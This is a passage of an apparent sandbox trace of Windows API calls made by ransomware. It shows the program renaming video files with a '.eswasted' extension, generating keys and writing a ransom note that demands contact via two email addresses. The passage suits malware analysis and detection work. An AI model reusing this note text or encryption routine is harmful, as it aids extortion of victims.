[0081.714] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.714] CloseHandle (hObject=0x110) returned 1 [0081.716] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.716] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2bf0 | out: hHeap=0x4a0000) returned 1 [0081.716] _aulldvrm () returned 0x0 [0081.716] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.717] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.717] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.717] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cyiJxHQnmAyIcUp.flv") returned 60 [0081.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x282) returned 0x4ef440 [0081.717] lstrcpyW (in: lpString1=0x4ef4b8, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.717] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.717] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.718] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.718] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.718] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cyiJxHQnmAyIcUp.flv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cyijxhqnmayicup.flv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.732] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.733] SetEndOfFile (hFile=0x118) returned 1 [0081.734] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.734] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.734] lstrcpyW (in: lpString1=0x4ef4b8, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.734] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cyiJxHQnmAyIcUp.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cyijxhqnmayicup.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cyiJxHQnmAyIcUp.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cyijxhqnmayicup.flv.eswasted")) returned 1 [0081.734] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\cyiJxHQnmAyIcUp.flv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\cyijxhqnmayicup.flv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.735] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0081.735] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x3f49 [0081.735] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3f49) returned 0x2d0000 [0081.735] CloseHandle (hObject=0x100) returned 1 [0081.738] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.738] CloseHandle (hObject=0x110) returned 1 [0081.738] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d91a8 [0081.738] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.739] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d91f0 | out: pbBuffer=0x4d91f0) returned 1 [0081.739] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.739] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.740] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.740] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.748] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4eaa28 [0081.748] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d91a8 | out: hHeap=0x4a0000) returned 1 [0081.748] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.748] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]NhrO12IqaQfNkxJI6qtDwmKKUT5AqLgsDWdR01ReVNKqCMFoenWFbabFgrTb07hr\r\nX8JqmR5aMDWhnutDQbViq9tYHdbCkOSFzx2nBlHMp8ZvxNb4Uuk3fzptXBh+eHJG\r\nH4FHKIpXQU7mB0k7lCqPwte9fpdhzwazgxSFyW3TMagT0QdbN2UJPbjAEAJoH4J5\r\njte20w18W6FXiBRyM1ACa1rqLT2K8Duqq2/QnKyVc7FCq7MN25GV3SxX3Leb4ZD8\r\nLg7IyQgy7ZGndUk8GEr3Lvin7Mci9bQ8hejAD0SfbO1z/ivTouTrO2PRwGjPZkdL\r\nafCqhBjlFZLzekcjukMygaNhjdtxKzeK1TgNDYpMPy3h3kI1TeuZS/87iF+xwxP/\r\nTzApQxMHB0LW+2DDCo5LUN4y4wzwM6u2ftRQQM2xGYd63oF+8cNOectb/i4JlGlk\r\nV1aHwW1a5wxnYtMaiOmzAYkeGFHfMMYtdZMReI6pehh7Ew7OYP1a3gku5k7YcwD/\r\nugb8GDquL6ezz3xtrMIVWL20kQ3VesYrCWRTNkJFNXXOVYFxGeWwOm1TzQQehNoK\r\nGEObzqPTABcnaVQPLEje6QXADb3CIUdHV3ZIdH44l7dFnnIMwyJFuTpUF8Kw9zP+\r\nVBMjTzae+u0v3MLPK3rQlcFw9qXTbD3qEtrsCnscYdI=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.748] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4eaa28 | out: hHeap=0x4a0000) returned 1 [0081.748] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.748] SetEndOfFile (hFile=0x118) returned 1 [0081.750] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.750] CloseHandle (hObject=0x118) returned 1 [0081.752] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.752] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4f2cc8 | out: hHeap=0x4a0000) returned 1 [0081.752] _aulldvrm () returned 0x0 [0081.752] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.753] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.753] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.753] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dGRpu.avi") returned 50 [0081.753] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x26e) returned 0x4ef440 [0081.753] lstrcpyW (in: lpString1=0x4ef4a4, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.753] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.753] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.754] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.754] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.754] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dGRpu.avi.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dgrpu.avi.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.755] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.819] SetEndOfFile (hFile=0x118) returned 1 [0081.819] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.819] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.819] lstrcpyW (in: lpString1=0x4ef4a4, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.819] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dGRpu.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dgrpu.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dGRpu.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dgrpu.avi.eswasted")) returned 1 [0081.820] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\dGRpu.avi.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\dgrpu.avi.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x100 [0081.820] CreateFileMappingW (hFile=0x100, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0081.821] GetFileSize (in: hFile=0x100, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0xafa7 [0081.821] MapViewOfFile (hFileMappingObject=0x110, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xafa7) returned 0x2d0000 [0081.821] CloseHandle (hObject=0x100) returned 1 [0081.825] UnmapViewOfFile (lpBaseAddress=0x2d0000) returned 1 [0081.826] CloseHandle (hObject=0x110) returned 1 [0081.826] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d93b0 [0081.826] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.827] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d93f8 | out: pbBuffer=0x4d93f8) returned 1 [0081.827] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.827] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.832] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.832] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.840] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.841] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d93b0 | out: hHeap=0x4a0000) returned 1 [0081.841] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.841] _snwprintf (in: _Dest=0x4dd498, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]W8xiWLQ68k7S0y7PlBGW9UNK+kLnO0mIjdt/qDeNzhIi3pTSu72ySS40haKA563r\r\n4151+qxrOv5791m5zGG0cri/wE1Ea9Cj9HJunzwu8tWDW1XQZryZUVUKFKd1uykR\r\n3nAPB6GZBhRP3yKFLs0tcuvut1up8n7GPGUbJHN3y6Wh2KRqBZSeQs2XQ81y2+fw\r\n4miuJASzmXHDs8kUuxdF3V3DD3NfHecJRyuMvk3hoBVT3R1tkIDFWDEISP0V9W1X\r\nOKAfn+e/A7WDLO1O7aLypLu3toc2mtUVz5cIxfZzsxLvbseoySG7/ngiBrqbqh/k\r\nyuLjf3/R/VM7i2FavHeUii5RcvKECQu5/fr88leJrTEyf4iCoHWg9n9BFLi59Nc/\r\nrLXAvn1StxVIf604mvSlmmcqi6RZP8uRN2RTocGJ95To7ECAKedG1ZtLUejufZGt\r\nRqKkQhahitGGKNOu3kWt4xr7f0QhrHpKApBQxNA7msNSFXYXOMLqc50qpqe1BGEa\r\n3Ep4hvzwYoJb8NXMDSSCN7ky5yca2VXWoieHSVUXMi5s/nVMZVq+/4rnL3W8FYad\r\nhrmaT2qKIanLGRKpS/qH4DcgzX1HJOL2Cp3Jxn30GA9Z96c3+d9r7ck1+RJZaYTi\r\nlpES04MO9deuCdewJFRVadeID/RPwK82G2D3sxF8tLB=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.841] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.841] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.841] SetEndOfFile (hFile=0x118) returned 1 [0081.844] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.844] CloseHandle (hObject=0x118) returned 1 [0081.849] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.849] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x5020c8 | out: hHeap=0x4a0000) returned 1 [0081.849] _aulldvrm () returned 0x0 [0081.849] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e5ff0) returned 1 [0081.850] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.850] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.850] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fTnnmg.mkv") returned 51 [0081.850] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x270) returned 0x4ef440 [0081.850] lstrcpyW (in: lpString1=0x4ef4a6, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.851] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4dd498 [0081.851] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e5ff0) returned 1 [0081.851] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0xa46, pbBuffer=0x4dd498 | out: pbBuffer=0x4dd498) returned 1 [0081.851] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.852] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fTnnmg.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ftnnmg.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.852] WriteFile (in: hFile=0x118, lpBuffer=0x4dd498*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4dd498*, lpNumberOfBytesWritten=0x121fec4*=0xa46, lpOverlapped=0x0) returned 1 [0081.853] SetEndOfFile (hFile=0x118) returned 1 [0081.854] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.854] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4dd498 | out: hHeap=0x4a0000) returned 1 [0081.854] lstrcpyW (in: lpString1=0x4ef4a6, lpString2=".eswasted" | out: lpString1=".eswasted") returned=".eswasted" [0081.854] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fTnnmg.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ftnnmg.mkv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fTnnmg.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ftnnmg.mkv.eswasted")) returned 1 [0081.855] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\fTnnmg.mkv.eswasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\ftnnmg.mkv.eswasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0081.855] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x100 [0081.855] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x121fe94 | out: lpFileSizeHigh=0x121fe94*=0x0) returned 0x1108e [0081.855] MapViewOfFile (hFileMappingObject=0x100, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1108e) returned 0xb10000 [0081.855] CloseHandle (hObject=0x110) returned 1 [0081.860] UnmapViewOfFile (lpBaseAddress=0xb10000) returned 1 [0081.860] CloseHandle (hObject=0x100) returned 1 [0081.860] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x200) returned 0x4d93b0 [0081.860] CryptAcquireContextW (in: phProv=0x121fe84, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fe84*=0x4e5ff0) returned 1 [0081.861] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x1b8, pbBuffer=0x4d93f8 | out: pbBuffer=0x4d93f8) returned 1 [0081.861] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.861] CryptAcquireContextW (in: phProv=0x121fbec, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fbec*=0x4e5ff0) returned 1 [0081.862] CryptGenRandom (in: hProv=0x4e5ff0, dwLen=0x200, pbBuffer=0x121fc08 | out: pbBuffer=0x121fc08) returned 1 [0081.862] CryptReleaseContext (hProv=0x4e5ff0, dwFlags=0x0) returned 1 [0081.920] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x403) returned 0x4ddfd8 [0081.921] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4d93b0 | out: hHeap=0x4a0000) returned 1 [0081.921] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.921] _snwprintf (in: _Dest=0x4e9fd8, _Count=0x523, _Format="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]%S[end_key]\r\nKEEP IT\r\n" | out: _Dest="ENERGYSOLUTIONS\r\n\r\nYOUR NETWORK IS ENCRYPTED NOW\r\n\r\nUSE 48907@PROTONMAIL.COM | 78470@TUTANOTA.COM TO GET THE PRICE FOR YOUR DATA\r\n\r\nDO NOT GIVE THIS EMAIL TO 3RD PARTIES\r\n\r\nDO NOT RENAME OR MOVE THE FILE\r\n\r\nTHE FILE IS ENCRYPTED WITH THE FOLLOWING KEY:\r\n[begin_key]uZUhfxFvAn7ZoKxqShDZOgyWpDASE51lCmA95gGAYbdhZFpE/LuE7G7/W14kf2YM\r\nKmYwfLe1qwinCilxKOx5Hkt1LNnZWvXzhgSs4w7QrRAQ/SeN1KiPrC5BYuYGpAxT\r\nuhDTziLRkO++/kBYf5QhagD0iOShh++HIaj9GsUduYNRVAelr2L5au+efyGuNT9R\r\n6bO3BVvmXsG3fd0f7NXs6MxJzz2H0kah0Vc/aKpN4mOiFvCA7wjIVVXMrmgnc3tq\r\n4EY4bsYCUIIRarTOidf9VI02OOixrh69FWJwiljA9Ki2A+9Kc87fxVlrUyXFWvjZ\r\nsH6C8MGWCNYeGMyc5ivPgB5eumvWu4Q2Y9oeNN+0u3czPx+B8Zf3tw6FdmP2//eZ\r\njGrFMDGdbPUpE82yltDw3lCaoXI/XXx8hW/JZzC08tKwjuuRyixgIuzv3i3KyWX3\r\nj5waNXAuYVbXTrZTFkhDLdgpgRg90HLexSAc8uHOoZFbcXQE2u0Dl1f2MoEE2Bxo\r\nS0+aPqWy6EkJEe7wINUtzeflENn16qUUdgmUl+3Tm3wSqJ3On7VmebHnDgKKtus5\r\n2IT83/cXrhkDNXLOwuSSB6gHgASxTg6EQx28H4a2tnNdJkQGC6VExNwTbZMvFAE9\r\nYPkrIE5Z22lAmvr+1fQ26wrTY3Wg+AZoFnuGGY+duXe=[end_key]\r\nKEEP IT\r\n") returned 990 [0081.921] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ddfd8 | out: hHeap=0x4a0000) returned 1 [0081.921] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0x7bc, lpNumberOfBytesWritten=0x121fef8, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, lpNumberOfBytesWritten=0x121fef8*=0x7bc, lpOverlapped=0x0) returned 1 [0081.921] SetEndOfFile (hFile=0x118) returned 1 [0081.924] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4e9fd8 | out: hHeap=0x4a0000) returned 1 [0081.924] CloseHandle (hObject=0x118) returned 1 [0081.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4ef440 | out: hHeap=0x4a0000) returned 1 [0081.926] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x502188 | out: hHeap=0x4a0000) returned 1 [0081.926] _aulldvrm () returned 0x0 [0081.926] CryptAcquireContextW (in: phProv=0x121fecc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fecc*=0x4e6078) returned 1 [0081.927] CryptGenRandom (in: hProv=0x4e6078, dwLen=0x48, pbBuffer=0x121ff08 | out: pbBuffer=0x121ff08) returned 1 [0081.927] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0081.927] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hWmaH7KTnB.mkv") returned 55 [0081.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0x278) returned 0x4d91a8 [0081.927] lstrcpyW (in: lpString1=0x4d9216, lpString2=".eswasted_info" | out: lpString1=".eswasted_info") returned=".eswasted_info" [0081.927] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0x0, Size=0xa46) returned 0x4e9fd8 [0081.927] CryptAcquireContextW (in: phProv=0x121fea8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x121fea8*=0x4e6078) returned 1 [0081.928] CryptGenRandom (in: hProv=0x4e6078, dwLen=0xa46, pbBuffer=0x4e9fd8 | out: pbBuffer=0x4e9fd8) returned 1 [0081.928] CryptReleaseContext (hProv=0x4e6078, dwFlags=0x0) returned 1 [0081.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\hWmaH7KTnB.mkv.eswasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\hwmah7ktnb.mkv.eswasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0081.929] WriteFile (in: hFile=0x118, lpBuffer=0x4e9fd8*, nNumberOfBytesToWrite=0xa46, lpNumberOfBytesWritten=0x121fec4, lpOverlapped=0x0 | out: lpBuffer=0x4e9fd8*, 